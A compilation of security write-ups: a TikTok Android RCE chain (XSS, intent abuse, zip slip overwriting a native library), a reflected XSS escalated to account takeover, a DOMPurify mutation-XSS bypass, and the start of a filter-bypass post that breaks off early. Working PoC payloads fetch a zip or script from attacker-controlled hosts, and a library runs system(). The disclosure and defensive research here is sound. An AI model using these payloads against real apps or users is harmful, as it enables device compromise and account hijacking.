TikTok for Android 1-Click RCE

TikTok for Android 1-Click RCE

Original text by Sayed Abdelhafiz

TL;DR

While testing TikTok for Android Application, I identified multiple bugs that can be chained to achieve Remote code execution that can be triaged through multiple dangerous attack vectors. In this write-up, we will discuss every bug and chain altogether. I worked on it for about 21-day, a long time. The final exploit was simple. The long time I spent in this exploit got me incredible experience and an important trick that helped me a lot in the exploit. TikTok implemented a fix to address the bugs identified, and it was retested to confirm the resolution.

Bugs

  1. Universal XSS on TikTok WebView
  2. Another XSS on AddWikiActivity
  3. Start Arbitrary Components
  4. Zip Slip in TmaTestActivity
  5. RCE!

Universal XSS on TikTok WebView

TikTok uses a specific WebView that can be invoked by deep-link, Inbox Messages. The WebView handle something called falcon links by grabbing it from the internal files instead of fetching it from their server every time the user uses it to increase the performance.

For performance measuring purposes, after finishing loading the page. The following function will get executed:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName(\'" + this.webviewURL + "\'))", v2);

The first idea got on my mind is injecting XSS Payload in the URL to escape the function call and execute my malicious code.

I tried the following link https://m.tiktok.com/falcon/?'),alert(1));//

Unfortunately, It didn’t work. I write a Frida script to hook android.webkit.WebView.evaluateJavascript Method to see what happens?

I found the following string is passed to the method:

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/?%27)%2Calert(1))%3B%2F%2F'))

The payload is getting encoded because It was in the query string segment. So I decided to put the payload in the fragment segment After #

https://m.tiktok.com/falcon/#'),alert(1));// will fire the following line:

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),alert(1));//'))

Now, It’s done! We have Universal XSS in that WebView.

Notice: It’s Universal XSS because that javascript code is fired if the link contains something like: m.tiktok.com/falcon/.

For example, https://www.google.com/m.tiktok.com/falcon/ will fire this XSS too.

Digging

After find this XSS, I started digging in that WebView to see how It can be harmful.

First, I set up my lab to make it easy for my testing. I have enabled WebViewDebug module to debug the WebView from my dev-tools in google chrome. You find the module here: https://github.com/feix760/WebViewDebugHook

I found that WebView supports the intent scheme. This scheme can make you able to build a customize intent and launch it as an activity. It’s helpful to avoid the export setting of the non-exported activities and maximize the testing scope.

Read the following paper for more information about this intent and how to implents: https://www.mbsd.jp/Whitepaper/IntentScheme.pdf

I tried to execute the following javascript code to open com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity Activity:

location = "intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;"

But I didn’t notice any effect of executing that javascript. I back to the WebViewClient to see what was happening. And the following code came:

boolean v0_7 = v0_6 == null ? true : v0_6.hasClickInTimeInterval();
if((v8.i) && !v0_7) {
v8.i = false;
v4 = true;
}
else {
v4 = v0_7;
}

This code restricts the intent scheme to takes effect unless the user has just clicked anywhere. Bad! I don’t prefer 2-click exploits. I saved it in my note and continue my digging trip.

ToutiaoJSBridge, It’s a bridge implemented in the WebView. It has many fruit functions, one of them was openSchema that used to open internal deep-links. There a deep link called aweme://wiki It used to open URLs on AddWikiActivity WebView.

Another XSS on AddWikiActivity

AddWikiActivity Implementing URL validation to make sure that no black URL would be opened in it. But the validation was in http or https schemes only. Because they think that any other scheme is invalid and don’t need to validate:

if(!e.b(arg8)) {
com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
return false;
}public static boolean b(String arg1) {
return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);
}

Pretty cool, If the validation is not on the javascript scheme. We can use that scheme to perform XSS attacks on that WebView too!

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
}));

<h1>PoC</h1> got printed on the WebView

Start Arbitrary Components

The good news is AddWikiActivity WebView supports the the intent scheme too without any restriction but if disable_app_link parameter was set to false. Easy man!

if the following code got execute in AddWikiActivity The UserFavoritesActivity will get invoked:

location.replace("intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;")

Zip Slip in TmaTestActivity

Now, we can open any activity and pass any extras to it. I found an activity called TmaTestActivity in a split package called split_df_miniapp.apk.

Notice: the splits packages don’t attach in the APK. It got downloaded after the first launch of the application by google play core. You can find those package by: adb shell pm path {package_name}

In a nutshell, TmaTestActivity was used to update the SDK by downloading a zip from the internet and extract it.

Uri v5 = Uri.parse(Uri.decode(arg5.toString()));
String v0 = v5.getQueryParameter("action");
if(m.a(v0, "sdkUpdate")) {
m.a(v5, "testUri");
this.updateJssdk(arg4, v5, arg6);
return;
}

To Invoke the update process we have to set action parameter to sdkUpdate.

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
String v0 = arg6.getQueryParameter("sdkUpdateVersion");
String v1 = arg6.getQueryParameter("sdkVersion");
String v6 = arg6.getQueryParameter("latestSDKUrl");
SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
v2.putString("sdk_update_version", v0).apply();
v2.putString("sdk_version", v1).apply();
v2.putString("latest_sdk_url", v6).apply();
DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
BundleHandlerParam v0_1 = new BundleHandlerParam();
v6_1.setInitialParam(arg5, v0_1);
ResolveDownloadHandler v5 = new ResolveDownloadHandler();
v6_1.setNextHandler(((BaseBundleHandler)v5));
SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();
v5.setNextHandler(((BaseBundleHandler)v6_2));
}

It collects the SDK updating information from the parameters, then invoke DownloadBaseBundleHandler instance, then set the next handler to ResolveDownloadHandler, then SetCurrentProcessBundleVersionHandler

Let’s start with DownloadBaseBundleHandler. It checks sdkUpdateVersion parameter to see if it was newer than the current one or not. We can set the value to 99.99.99 to avoid this check, then starting the download:

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
.....
String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
.....
if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
v10.appendLog("no need update remote basebundle version");
arg15.isIgnoreTask = true;
return arg15;
}
.....
this.startDownload(v9, v10, arg15, v0, v8);
.....

In startDownload Method, I found that:

v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
v2.b = this.getMd5FromUrl(arg16);

v2.a is the download path. It gets the application context from AppbrandContext and it must have an Instance. Unfortunately, the application didn’t init this instance all time. But I told you that I spent 21-day on this exploit, yeah!? It was enough for me to gain extensive knowledge about the application workflow. And yes! I saw somewhere this instance getting inited.

Invoking the preloadMiniApp function through ToutiaoJSBridge was able to init the instance for me! It was easy for me! Digging on every function on this bridge, even It doesn’t look helpful for me for the first time, but it became useful in this situation ;).

v2.b is the md5sum of the downloading file. It gets from the filename itself:

private String getMd5FromUrl(String arg3) {
return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));
}

The filename must look like: anything_{md5sum_of_file}.zip because the md5sum will be compared with the file md5sum after downloading:

public void onDownloadSuccess(ad arg11) {
super.onDownloadSuccess(arg11);
File v11 = new File(this.val$tmaFileRequest.a, this.val$tmaFileRequest.b);
long v6 = this.val$beginDownloadTime.getMillisAfterStart();
if(!v11.exists()) {
this.val$baseBundleEvent.appendLog("remote basebundle download fail");
this.val$param.isLastTaskSuccess = false;
this.val$baseBundleEvent.appendLog("remote basebundle not exist");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
}
else if(this.val$tmaFileRequest.b.equals(CharacterUtils.md5Hex(v11))) {
this.val$baseBundleEvent.appendLog("remote basebundle download success, md5 verify success");
this.val$param.isLastTaskSuccess = true;
this.val$param.targetZipFile = v11;
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "success", "", v6);
}
else {
this.val$baseBundleEvent.appendLog("remote basebundle md5 not equals");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
this.val$param.isLastTaskSuccess = false;
}

After download processing finished, the file gets passed to ResolveDownloadHandler, to unzip It:

public BundleHandlerParam handle(Context arg13, BundleHandlerParam arg14) {
BaseBundleEvent v0 = arg14.baseBundleEvent;
if((arg14.isLastTaskSuccess) && arg14.targetZipFile != null && (arg14.targetZipFile.exists())) {
arg14.bundleVersion = BaseBundleFileManager.unZipFileToBundle(arg13, arg14.targetZipFile, "download_bundle", false, v0);public static long unZipFileToBundle(Context arg8, File arg9, String arg10, boolean arg11, BaseBundleEvent arg12) {
long v10;
boolean v4;
Class v0 = BaseBundleFileManager.class;
synchronized(v0) {
boolean v1 = arg9.exists();
}
if(!v1) {
return 0L;
}
try {
File v1_1 = BaseBundleFileManager.getBundleFolderFile(arg8, arg10);
arg12.appendLog("start unzip" + arg10);
BaseBundleFileManager.tryUnzipBaseBundle(arg12, arg10, v1_1.getAbsolutePath(), arg9);private static void tryUnzipBaseBundle(BaseBundleEvent arg2, String arg3, String arg4, File arg5) {
try {
arg2.appendLog("unzip" + arg3);
IOUtils.unZipFolder(arg5.getAbsolutePath(), arg4);
}
......
}public static void unZipFolder(String arg1, String arg2) throws Exception {
IOUtils.a(new FileInputStream(arg1), arg2, false);
}private static void a(InputStream arg5, String arg6, boolean arg7) throws Exception {
ZipInputStream v0 = new ZipInputStream(arg5);
while(true) {
label_2:
ZipEntry v5 = v0.getNextEntry();
if(v5 == null) {
break;
}
String v1 = v5.getName();
if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Are you notice arg7?
goto label_2;
}
if(v5.isDirectory()) {
new File(arg6 + File.separator + v1.substring(0, v1.length() - 1)).mkdirs();
goto label_2;
}
File v5_1 = new File(arg6 + File.separator + v1);
if(!v5_1.getParentFile().exists()) {
v5_1.getParentFile().mkdirs();
}
v5_1.createNewFile();
FileOutputStream v1_1 = new FileOutputStream(v5_1);
byte[] v5_2 = new byte[0x400];
while(true) {
int v3 = v0.read(v5_2);
if(v3 == -1) {
break;
}
v1_1.write(v5_2, 0, v3);
v1_1.flush();
}
v1_1.close();
}
v0.close();
}

In the last method called to unzip the file, there is a check for path traversal, but because arg7 value is false, the check won’t happen! Perfect!!

It makes us able to exploit ZIP Slip and overwrite some delicious files.

Time for RCE!

I created a zip file and path traversed the filename to overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so file:

dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

--
Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files

Now we can overwrite native-libraries with a malicious library to execute our code. It won’t be executed unless the user relaunches the Application. I found a way to reload that library without relaunch by launching com.tt.miniapphost.placeholder.MiniappTabActivity0 Activity.

Final PoC:

document.title = "Loading..";
document.write("<h1>Loading..</h1>");
if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.
window.name = "finished";
window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "preloadMiniApp",
"__msg_type": "callback",
"params": {
"mini_app_url": "https://microapp/"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://d.c/"
})); // initialize Mini App
window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
setTimeout(function() {
window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // load the malicious library after overwrtting it.
}, 5000);
}

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>


JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system("id > /data/data/com.zhiliaoapp.musically/PoC");
return JNI_VERSION_1_6;
}

TikTok Fixing!

TikTok Security implemented an excellent and responsible fix to address those vulnerabilities in a timely manner. The following actions were taken:

  1. The vulnerable XSS code has been deleted.
  2. TmaTestActivity has been deleted.
  3. Implement restrictions to intent scheme that doesn’t allow an intent for TikTok Application on AddWikiActivity and Main WebViewActivity.

Have a nice day!

Escalating XSS to Account Takeover

Escalating XSS to Account Takeover

Original text by Aditya Verma

Hey guys, this writeup is about my first Reflected XSS and how I escalated it to account takeover.

I read many Bug Hunters implying on the fact that don’t submit a simple XSS, try to escalate it. I also would tell you to escalate as much as you can, if you give them a XSS and tell what a person can do with it, it does not shows the amount of impact as you would be able to show when you prove with how it would be done; this will increase the severity as well as your payout.

So, I was hunting on a subdomain of a private program say sub.example.com, I had been looking over this subdomain for few days and had understood almost every thing about how the things are working and what a simple person(normal account) can do.Now, I started looking for other files (which are directly not linked)in various directories of the site by directory and files fuzzing using FFUF. I found a file that looked interesting as it was a page to register (let’s name it sub.example.com/fakepath/register) and the main page that opened when someone clicked for registration was sub.example.com/fakepath/registration.

Confused Jon Stewart GIF - Find & Share on GIPHY

Now this felt like maybe this page was used earlier and then they changed things.So, as you must know that old and forgotten pages have more chances of bugs.

I ran Arjun to check for any hidden parameters and luckily found a few parameters that were being reflected back on the page.Out of those parameters 2 of them were filling in the input fields of the registration form.I send the request with first parameter and it filled the value supplied thorugh URL into the city input field.Sent the request to Burpsuite Repeater and tried basic XSS inputs.Sadly, it got html encoded ; I tried single URL encoding and double URL encoding, none worked and which made me move on to check other paratmeters.

Baby Reaction GIF - Find & Share on GIPHY

After trying almost every parameter recieved from Arjun I came back to the repeater tab of the earlier one, and just randomly gave another try with Triple URL encoding and guess what the quote(“) character passed on.

Happy You Good GIF - Find & Share on GIPHY

Made a simple payload to check sub.example.com/fakepath/register?i=aditya%252522+onmouseover=alert(1)+x=%252522sI added x parameter at last to balance the quote that is being added by system. Hovered on city input field and it popped out. I checked on other parameter that was being reflected in another input field and it was also vulnerable to similar payload.I also noticed that the registration and register page are almost similar and gave a try on registration and yes both parameters were vulnerable at that page also.

Reported the Bug as medium severity and came back. Now, got the thought that try to escalate it as other people say.I was at first reluctant but since I had already checked for CSRF on various forms like edit account and much I thought since this can execute script why not fetch the account edit page with javascript which will come with CSRF token(in this case tokens) and then send the data back with email changed.

This took some time as I am not much of a developer but short time ago I had done a project with nodeJS. With little earlier familarity and lot googling I somehow put the jigsaw pieces aligned and the script was ready(I created this script on Firefox developer tools; Just incase anyone wanna know how to do it, the console panel allows running of javascript on webpage as it would have come along with the page).Hosted the script locally and used ngrok to create a tunnel to localhost.Used the following payload sub.example.com/fakepath/register?i=aditya%252522+/%25253e%25253cscript+src%3d%252522https://my_ngrok_url/script.js%252522%25253e%25253c/script%25253e

Here is the script:

let name=[];
let value=[];
fetch('https://sub.example.com/fakepath/accountchange.php?update=1')
.then(function(response) {
return response.text()
}).then(function (html) {// Convert the HTML string into a document object
var parser = new DOMParser();
var doc = parser.parseFromString(html, 'text/html');
//var forms=doc.forms[0];
//console.log(doc);
var element = doc.querySelectorAll('input[type="hidden"]');
//var name=[];
//var value=[];
for(var i=0; i<element.length;i++){
name.push(element[i].name);
value.push(element[i].value);
}
console.log(name,value,"\n");
}).catch(function (err) {
// There was an error
console.warn('Something went wrong.', err);
});
//////////////////////////////////////////////////////////////////////
function sendData( data ) {
const XHR = new XMLHttpRequest(),
FD = new FormData();
console.log(name,value);
// Push our data into our FormData object
for(var i=0;i<7;i++) {
console.log(FD);
FD.append( name[i],value[i] );
}
FD.append('lastname','a');
FD.append('name',"test");
FD.append('email','hellrider9+1@wearehackerone.com');
FD.append('Sumbit','Sumbit');
// Define what happens on successful data submission
XHR.addEventListener( 'load', function( event ) {
alert( 'Yeah! Data sent and response loaded.' );
} );// Define what happens in case of error
XHR.addEventListener(' error', function( event ) {
alert( 'Oops! Something went wrong.' );
} );// Set up our request
XHR.open( 'POST', 'https://sub.example.com/fakepath/accountchange.php?update=1' );// Send our FormData object; HTTP headers are set automatically
XHR.send( FD );
}setTimeout(sendData,7000);

If anyone wanna understand the code then you can directly contact me through Twitter, my handle is 0cirius0.

Coming back now this Reflected XSS became a high severity Account Takeover.

Mutation XSS via namespace confusion – DOMPurify < 2.0.17 bypass

Original text by MICHAŁ BENTKOWSKI

In this blogpost I’ll explain my recent bypass in DOMPurify – the popular HTML sanitizer library. In a nutshell, DOMPurify’s job is to take an untrusted HTML snippet, supposedly coming from an end-user, and remove all elements and attributes that can lead to Cross-Site Scripting (XSS).

This is the bypass:

<form><math><mtext>
</form><form><mglyph>
<style></math><img src onerror=alert(1)>

Believe me that there’s not a single element in this snippet that is superfluous 🙂

To understand why this particular code worked, I need to give you a ride through some interesting features of HTML specification that I used to make the bypass work.

Usage of DOMPurify

Let’s begin with the basics, and explain how DOMPurify is usually used. Assuming that we have an untrusted HTML in htmlMarkup and we want to assign it to a certain div, we use the following code to sanitize it using DOMPurify and assign to the div:

div.innerHTML = DOMPurify.sanitize(htmlMarkup)

In terms of parsing and serializing HTML as well as operations on the DOM tree, the following operations happen in the short snippet above:

  1. htmlMarkup is parsed into the DOM Tree.
  2. DOMPurify sanitizes the DOM Tree (in a nutshell, the process is about walking through all elements and attributes in the DOM tree, and deleting all nodes that are not in the allow-list).
  3. The DOM tree is serialized back into the HTML markup.
  4. After assignment to innerHTML, the browser parses the HTML markup again.
  5. The parsed DOM tree is appended into the DOM tree of the document.

Let’s see that on a simple example. Assume that our initial markup is A<img src=1 onerror=alert(1)>B. In the first step it is parsed into the following tree:

Then, DOMPurify sanitizes it, leaving the following DOM tree:

Then it is serialized to:

A<img src=»1″>B

And this is what DOMPurify.sanitize returns. Then the markup is parsed again by the browser on assignment to innerHTML:

The DOM tree is identical to the one that DOMPurify worked on, and it is then appended to the document.

So to put it shortly, we have the following order of operations: parsing ➡️ serialization ➡️ parsing. The intuition may be that serializing a DOM tree and parsing it again should always return the initial DOM tree. But this is not true at all. There’s even a warning in the HTML spec in a section about serializing HTML fragments:

It is possible that the output of this algorithm [serializing HTML], if parsed with an HTML parser, will not return the original tree structure. Tree structures that do not roundtrip a serialize and reparse step can also be produced by the HTML parser itself, although such cases are typically non-conforming.

The important take-away is that serialize-parse roundtrip is not guaranteed to return the original DOM tree (this is also a root cause of a type of XSS known as mutation XSS). While usually these situations are a result of some kind of parser/serializer error, there are at least two cases of spec-compliant mutations.

Nesting FORM element

One of these cases is related to the FORM element. It is quite special element in the HTML because it cannot be nested in itself. The specification is explicit that it cannot have any descendant that is also a FORM:

This can be confirmed in any browser, with the following markup:

<form id=form1>INSIDE_FORM1<form id=form2>INSIDE_FORM2

Which would yield the following DOM tree:

The second form is completely omitted in the DOM tree just as it wasn’t ever there.

Now comes the interesting part. If we keep reading the HTML specification, it actually gives an example that with a slightly broken markup with mis-nested tags, it is possible to create nested forms. Here it comes (taken directly from the spec):

<form id=»outer»><div></form><form id=»inner»><input>

It yields the following DOM tree, which contains a nested form element:

This is not a bug in any particular browser; it results directly from the HTML spec, and is described in the algorithm of parsing HTML. Here’s the general idea:

  • When you open a <form> tag, the parser needs to keep record of the fact that it was opened with a form element pointer (that’s how it’s called in the spec). If the pointer is not null, then form element cannot be created.
  • When you end a <form> tag, the form element pointer is always set to null.

Thus, going back to the snippet:

<form id=»outer»><div></form><form id=»inner»><input>

In the beginning, the form element pointer is set to the one with id="outer". Then, a div is being started, and the </form> end tag set the form element pointer to null. Because it’s null, the next form with id="inner" can be created; and because we’re currently within div, we effectively have a form nested in form.

Now, if we try to serialize the resulting DOM tree, we’ll get the following markup:

<form id=»outer»><div><form id=»inner»><input></form></div></form>

Note that this markup no longer has any mis-nested tags. And when the markup is parsed again, the following DOM tree is created:

So this is a proof that serialize-reparse roundtrip is not guaranteed to return the original DOM tree. And even more interestingly, this is basically a spec-compliant mutation.

Since the very moment I was made aware of this quirk, I’ve been pretty sure that it must be possible to somehow abuse it to bypass HTML sanitizers. And after a long time of not getting any ideas of how to make use of it, I finally stumbled upon another quirk in HTML specification. But before going into the specific quirk itself, let’s talk about my favorite Pandora’s box of the HTML specification: foreign content.

Foreign content

Foreign content is a like a Swiss Army knife for breaking parsers and sanitizers. I used it in my previous DOMPurify bypass as well as in bypass of Ruby sanitize library.

The HTML parser can create a DOM tree with elements of three namespaces:

  • HTML namespace (http://www.w3.org/1999/xhtml)
  • SVG namespace (http://www.w3.org/2000/svg)
  • MathML namespace (http://www.w3.org/1998/Math/MathML)

By default, all elements are in HTML namespace; however if the parser encounters <svg> or <math> element, then it “switches” to SVG and MathML namespace respectively. And both these namespaces make foreign content.

In foreign content markup is parsed differently than in ordinary HTML. This can be most clearly shown on parsing of <style> element. In HTML namespace, <style> can only contain text; no descendants, and HTML entities are not decoded. The same is not true in foreign content: foreign content’s <style> can have child elements, and entities are decoded.

Consider the following markup:

<style><a>ABC</style><svg><style><a>ABC

It is parsed into the following DOM tree

Note: from now on, all elements in the DOM tree in this blogpost will contain a namespace. So html style means that it is a <style> element in HTML namespace, while svg style means that it is a <style> element in SVG namespace.

The resulting DOM tree proves my point: html style has only text content, while svg style is parsed just like an ordinary element.

Moving on, it may be tempting to make a certain observation. That is: if we are inside <svg> or <math> then all elements are also in non-HTML namespace. But this is not true. There are certain elements in HTML specification called MathML text integration points and HTML integration point. And the children of these elements have HTML namespace (with certain exceptions I’m listing below).

Consider the following example:

<math><style></style><mtext><style></style>

It is parsed into the following DOM tree:

Note how the style element that is a direct child of math is in MathML namespace, while the style element in mtext is in HTML namespace. And this is because mtext is MathML text integration points and makes the parser switch namespaces.

MathML text integration points are:

  • math mi
  • math mo
  • math mn
  • math ms

HTML integration points are:

  • math annotation-xml if it has an attribute called encoding whose value is equal to either text/html or application/xhtml+xml
  • svg foreignObject
  • svg desc
  • svg title

I always assumed that all children of MathML text integration points or HTML integration points have HTML namespace by default. How wrong was I! The HTML specification says that children of MathML text integration points are by default in HTML namespace with two exceptions: mglyph and malignmark. And this only happens if they are a direct child of MathML text integration points.

Let’s check that with the following markup:

<math><mtext><mglyph></mglyph><a><mglyph>

Notice that mglyph that is a direct child of mtext is in MathML namespace, while the one that is a child of html a element is in HTML namespace.

Assume that we have a “current element”, and we’d like determine its namespace. I’ve compiled some rules of thumb:

  • Current element is in the namespace of its parent unless conditions from the points below are met.
  • If current element is <svg> or <math> and parent is in HTML namespace, then current element is in SVG or MathML namespace respectively.
  • If parent of current element is an HTML integration point, then current element is in HTML namespace unless it’s <svg> or <math>.
  • If parent of current element is an MathML integration point, then current element is in HTML namespace unless it’s <svg><math><mglyph> or <malignmark>.
  • If current element is one of <b>, <big>, <blockquote>, <body>, <br>, <center>, <code>, <dd>, <div>, <dl>, <dt>, <em>, <embed>, <h1>, <h2>, <h3>, <h4>, <h5>, <h6>, <head>, <hr>, <i>, <img>, <li>, <listing>, <menu>, <meta>, <nobr>, <ol>, <p>, <pre>, <ruby>, <s>, <small>, <span>, <strong>, <strike>, <sub>, <sup>, <table>, <tt>, <u>, <ul>, <var> or <font> with colorface or size attributes defined, then all elements on the stack are closed until a MathML text integration point, HTML integration point or element in HTML namespace is seen. Then, the current element is also in HTML namespace.

When I found this gem about mglyph in HTML spec, I immediately knew that it was what I’d been looking for in terms of abusing html form mutation to bypass sanitizer.

DOMPurify bypass

So let’s get back to the payload that bypasses DOMPurify:

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

The payload makes use of the mis-nested html form elements, and also contains mglyph element. It produces the following DOM tree:

This DOM tree is harmless. All elements are in the allow-list of DOMPurify. Note that mglyph is in HTML namespace. And the snippet that looks like XSS payload is just a text within html style. Because there’s a nested html form, we can be pretty sure that this DOM tree is going to be mutated on reparsing.

So DOMPurify has nothing to do here, and returns a serialized HTML:

1<form><math><mtext><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>

This snippet has nested form tags. So when it is assigned to innerHTML, it is parsed into the following DOM tree:

So now the second html form is not created and mglyph is now a direct child of mtext, meaning it is in MathML namespace. Because of that, style is also in MathML namespace, hence its content is not treated as a text. Then </math> closes the <math> element, and now img is created in HTML namespace, leading to XSS.

Summary

To summarize, this bypass was possible because of a few factors:

  • The typical usage of DOMPurify makes the HTML markup to be parsed twice.
  • HTML specification has a quirk, making it possible to create nested form elements. However, on reparsing, the second form will be gone.
  • mglyph and malignmark are special elements in the HTML spec in a way that they are in MathML namespace if they are a direct child of MathML text integration point even though all other tags are in HTML namespace by default.
  • Using all of the above, we can create a markup that has two form elements and mglyph element that is initially in HTML namespace, but on reparsing it is in MathML namespace, making the subsequent style tag to be parsed differently and leading to XSS.

After Cure53 pushed update to my bypass, another one was found:https://platform.twitter.com/embed/index.html?dnt=false&embedId=twitter-widget-1&frame=false&hideCard=false&hideThread=false&id=1307929537749999616&lang=en&origin=https%3A%2F%2Fresearch.securitum.com%2Fmutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass%2F&theme=light&widgetsVersion=ed20a2b%3A1601588405575&width=550px

I leave it as an exercise for the reader to figure it out why this payload worked. Hint: the root cause is the same as in the bug I found.

The bypass also made me realize that the pattern of

1div.innerHTML = DOMPurify.sanitize(html)

Is prone to mutation XSS-es by design and it’s just a matter of time to find another instances. I strongly suggest that you pass RETURN_DOM or RETURN_DOM_FRAGMENT options to DOMPurify, so that the serialize-parse roundtrip is not executed.

As a final note, I found the DOMPurify bypass when preparing materials for my upcoming remote training called XSS Academy. While it hasn’t been officially announced yet, details (including agenda) will be published within two weeks. I will teach about interesting XSS tricks with lots of emphasis on breaking parsers and sanitizers. If you already know that you’re interested, please contact us on training@securitum.com and we’ll have your seat booked!

XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization

Original text by Menin_TheMiddle

Using JavaScript Arithmetic Operators and Optional Chaining to bypass input validation, sanitization and HTML Entity Encoding when injection occurs in the JavaScript context. To know how to exploit an injection that could lead to an XSS vulnerability, it’s important to understand in which context the injected payload must work.

In the HTML context, the injected payload it’s different than what can be used in the JavaScript context.

Talking about JavaScript context, often developers use encoding functions as a quick and dirty way to sanitize untrusted user input (for example, converting «special» characters to HTML entities). It may appear a good injection killer to convert characters such as a single quote, double quotes, semicolon, etc… to their respective HTML entity codes, but in the JavaScript context it isn’t always a good way to prevent stored or reflected XSS. Quoting the OWASP Cross Site Scripting Prevention Cheat Sheet:

HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you’re religious about using quotes around your attributes. But HTML entity encoding doesn’t work if you’re putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the encode syntax for the part of the HTML document you’re putting untrusted data into. That’s what the rules below are all about.

Vulnerable Application

During a test on a customer’s web application, I found something very closed to the following code (it’s more simplified than the original):

Here the developer used the PHP htmlentities function to sanitize the user input on $_GET['user'] converting special characters to HTML entities and using ENT_QUOTES flag to convert both single and double quotes (as you can see in the table below):

